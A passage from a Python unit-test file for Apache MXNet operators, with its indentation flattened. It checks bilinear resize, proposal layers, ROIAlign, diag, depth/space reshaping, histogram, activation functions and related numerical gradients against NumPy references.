rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputHeight - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output.asnumpy(),expected,
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1.asnumpy(), np_bins1)
assert_almost_equal(mx_histo1.asnumpy(), np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2.asnumpy(), np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2.asnumpy(), np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_input0', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
@with_seed()
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@with_seed()
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
assert_almost_equal(data.grad.asnumpy(), dx, atol=1e-3)
assert_almost_equal(rois.grad.asnumpy(), drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k == 0
r = mx.nd.diag(a)
assert_almost_equal(r.asnumpy(), np.diag(a_np))
# k == 1
k = 1
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# k == -1
k = -1
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# random k
k = np.random.randint(-min(h,w) + 1, min(h,w))
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
